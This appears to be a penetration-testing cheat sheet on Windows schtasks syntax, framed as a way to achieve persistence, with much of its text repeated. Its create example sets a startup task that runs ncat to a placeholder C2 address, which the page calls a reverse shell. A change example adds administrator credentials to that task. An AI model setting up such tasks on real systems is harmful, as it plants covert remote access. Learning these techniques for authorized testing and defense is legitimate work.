Scheduled Tasks

A great way to achieve persistence.

Display Syntax

Parameter

Description

Performs a local or remote host search to determine what scheduled tasks exist. Due to permissions, not all tasks may be seen by a normal user.

/fo

Sets formatting options. We can specify to show results in the Table, List, or CSV output.

Sets verbosity to on, displaying the advanced properties set in displayed tasks when used with the List or CSV output parameter.

/nh

Simplifies the output using the Table or CSV output format. This switch removes the column headers.

Sets the DNS name or IP address of the host we want to connect to. Localhost is the default specified. If /s is utilized, we are connecting to a remote host and must format it as "\\host".

This switch will tell schtasks to run the following command with the permission set of the user specified.

Sets the password in use for command execution when we specify a user to run the task. Users must be members of the Administrator's group on the host (or in the domain). The u and p values are only valid when used with the s parameter.

View the host's existing scheduled tasks.

# view all scheduled tasks
schtasks /Query /V /FO list
# query a specific task
schtasks /query /tn "My Task" /V /fo list

Create Syntax

Parameter

Description

/sc

Sets the schedule type. It can be by the minute, hourly, weekly, and much more. Be sure to check the options parameters.

/tn

Sets the name for the task we are building. Each task must have a unique name.

/tr

Sets the trigger and task that should be run. This can be an executable, script, or batch file.

Specify the host to run on, much like in Query.

Specifies the local user or domain user to utilize

Sets the Password of the user-specified.

/mo

Allows us to set a modifier to run within our set schedule. For example, every 5 hours every other day.

/rl

Allows us to limit the privileges of the task. Options here are limited access and Highest. Limited is the default value.

Will set the task to be deleted after completion of its actions.

For creating a new scheduled task we must specify, at a minimum, the following:

/create : to tell it what we are doing
/sc : we must set a schedule
/tn : we must set the name
/tr : we must give it an action to take

schtasks /create /sc ONSTART /tn "My Task" /tr "c:\users\<user>\appdata\local\ncat.exe <c2c-ip> <c2c-port>"

Change Syntax

Parameter

Description

/tn

Designates the task to change

/tr

Modifies the program or action that the task runs.

/ENABLE

Change the state of the task to Enabled.

/DISABLE

Change the state of the task to Disabled.

# adding credentials to our reverse shell task
schtasks /change /tn "My Task" /ru administrator /rp "P@ssw0rd"
# run the task immediately
schtasks /run /tn "My Task"

Delete Syntax

Parameter

Description

/tn

Identifies the task to delete.

Specifies the name or IP address to delete the task from.

Specifies the user to run the task as.

Specifies the password to run the task as.

Stops the confirmation warning.

schtasks /delete /tn "My Task" /f

PreviousManaging Services NextHelp

Last updated 1 year ago

Display Syntax

Parameter

Description

Performs a local or remote host search to determine what scheduled tasks exist. Due to permissions, not all tasks may be seen by a normal user.

/fo

Sets formatting options. We can specify to show results in the Table, List, or CSV output.

Sets verbosity to on, displaying the advanced properties set in displayed tasks when used with the List or CSV output parameter.

/nh

Simplifies the output using the Table or CSV output format. This switch removes the column headers.

Sets the DNS name or IP address of the host we want to connect to. Localhost is the default specified. If /s is utilized, we are connecting to a remote host and must format it as "\\host".

This switch will tell schtasks to run the following command with the permission set of the user specified.

View the host's existing scheduled tasks.

# view all scheduled tasks
schtasks /Query /V /FO list
# query a specific task
schtasks /query /tn "My Task" /V /fo list

Create Syntax

Parameter

Description

/sc

Sets the schedule type. It can be by the minute, hourly, weekly, and much more. Be sure to check the options parameters.

/tn

Sets the name for the task we are building. Each task must have a unique name.

/tr

Sets the trigger and task that should be run. This can be an executable, script, or batch file.

Specify the host to run on, much like in Query.

Specifies the local user or domain user to utilize

Sets the Password of the user-specified.

/mo

Allows us to set a modifier to run within our set schedule. For example, every 5 hours every other day.

/rl

Allows us to limit the privileges of the task. Options here are limited access and Highest. Limited is the default value.

Will set the task to be deleted after completion of its actions.

For creating a new scheduled task we must specify, at a minimum, the following:

/create : to tell it what we are doing

/sc : we must set a schedule

/tn : we must set the name

/tr : we must give it an action to take

schtasks /create /sc ONSTART /tn "My Task" /tr "c:\users\<user>\appdata\local\ncat.exe <c2c-ip> <c2c-port>"

Change Syntax

Parameter

Description

/tn

Designates the task to change

/tr

Modifies the program or action that the task runs.

/ENABLE

Change the state of the task to Enabled.

/DISABLE

Change the state of the task to Disabled.

# adding credentials to our reverse shell task
schtasks /change /tn "My Task" /ru administrator /rp "P@ssw0rd"
# run the task immediately
schtasks /run /tn "My Task"